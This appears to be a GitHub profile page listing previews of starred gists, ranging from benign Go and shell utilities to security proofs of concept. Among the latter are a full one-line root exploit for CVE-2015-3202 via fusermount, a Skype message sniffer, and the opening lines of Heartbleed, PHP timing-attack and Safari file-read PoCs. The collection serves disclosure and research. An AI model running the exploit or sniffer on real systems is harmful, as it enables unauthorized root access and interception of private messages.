Skip to content

Instantly share code, notes, and snippets.

View akamajoris's full-sized avatar
💭
Life

Canis Majoris akamajoris

💭
Life
66 followers · 48 following
View GitHub Profile
@PaulSec
PaulSec / skype_sniffer.py
Created October 29, 2015 11:48
Simple Skype Sniffer
import Skype4Py
def Commands(message, status):
if status == 'SENT' or (status == 'RECEIVED'):
print message.Body
skype = Skype4Py.Skype()
skype.OnMessageStatus = Commands
skype.Attach()
while True:
@TheGU
TheGU / uploader.go
Created September 11, 2015 10:07
Golang to upload file to google drive with progress bar using Google API
package main
import (
"encoding/json"
"fmt"
"io/ioutil"
"log"
"net/http"
"net/url"
"os"
@iamralch
iamralch / compress.go
Last active February 11, 2025 19:32
ZIP archives in Golang
import (
"archive/zip"
"io"
"os"
"path/filepath"
"strings"
)
func zipit(source, target string) error {
zipfile, err := os.Create(target)
@defuse
defuse / attack.php
Last active February 19, 2025 01:51
PoC: Attack Against PHP Crypto
<?php
/*
* This code is copied from
* http://www.warpconduit.net/2013/04/14/highly-secure-data-encryption-decryption-made-easy-with-php-mcrypt-rijndael-256-and-cbc/
* to demonstrate an attack against it. Specifically, we simulate a timing leak
* in the MAC comparison which, in a Mac-then-Encrypt (MtA) design, we show
* breaks confidentiality.
*
* Slight modifications such as making it not serialize/unserialize and removing
@epixoip
epixoip / 8xTitanX.md
Last active October 10, 2019 23:10
World's First 8x Nvidia GTX Titan X cudaHashcat Benchmarks
@taviso
taviso / CVE-2015-3202
Created May 21, 2015 12:52
Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet.
# Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet.
12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202
# Here's how it works, $a holds the name of a shellscript to be executed as
# root.
a=/tmp/.$$;
# $b is used twice, first to build the contents of shellscript $a, and then as
@epixoip
epixoip / 8x980_updated.md
Last active October 25, 2017 03:16
** UPDATED 4/16 ** 8x GTX 980 cudaHashcat Benchmark

8x GTX 980 cudaHashcat Benchmark

Product: Sagitta Brutalis 980 (PN S2480-GTX-980)

Software: cudaHashcat 1.36b25, ForceWare 346.35

Accelerator: 8x Nvidia GTX 980 reference design, +250 clock offset

Highlights

@rongarret
rongarret / gist:d8987c9cd57bd768e1de
Last active August 29, 2015 14:17
Safari FILE: scheme security hole
It appears that Safari does not enforce any kind of access
restrictions for XMLHTTPRequests on FILE: scheme URLs. As a
result, any HTML file on the local file system that is opened in
Safari can read any file that the user has access to (and, of
course, it can upload those files too). Here's a little
proof-of-concept. Copy and paste this into a local HTML file and
open it in Safari. It will display the contents of /etc/passwd.
<script src=https://code.jquery.com/jquery-2.1.3.min.js></script>
<script>
@MattWilcox
MattWilcox / build_nginx.sh
Last active March 6, 2022 18:01
Fetch, build, and install the latest nginx with the latest OpenSSL for RaspberryPi
#!/usr/bin/env bash
# names of latest versions of each package
export VERSION_PCRE=pcre-8.38
export VERSION_OPENSSL=openssl-1.0.2d
export VERSION_NGINX=nginx-1.9.7
# URLs to the source directories
export SOURCE_OPENSSL=https://www.openssl.org/source/
export SOURCE_PCRE=ftp://ftp.csx.cam.ac.uk/pub/software/programming/pcre/
@sh1n0b1
sh1n0b1 / ssltest.py
Created April 8, 2014 07:53
Python Heartbleed (CVE-2014-0160) Proof of Concept
#!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected])
# The author disclaims copyright to this source code.
import sys
import struct
import socket
import time
import select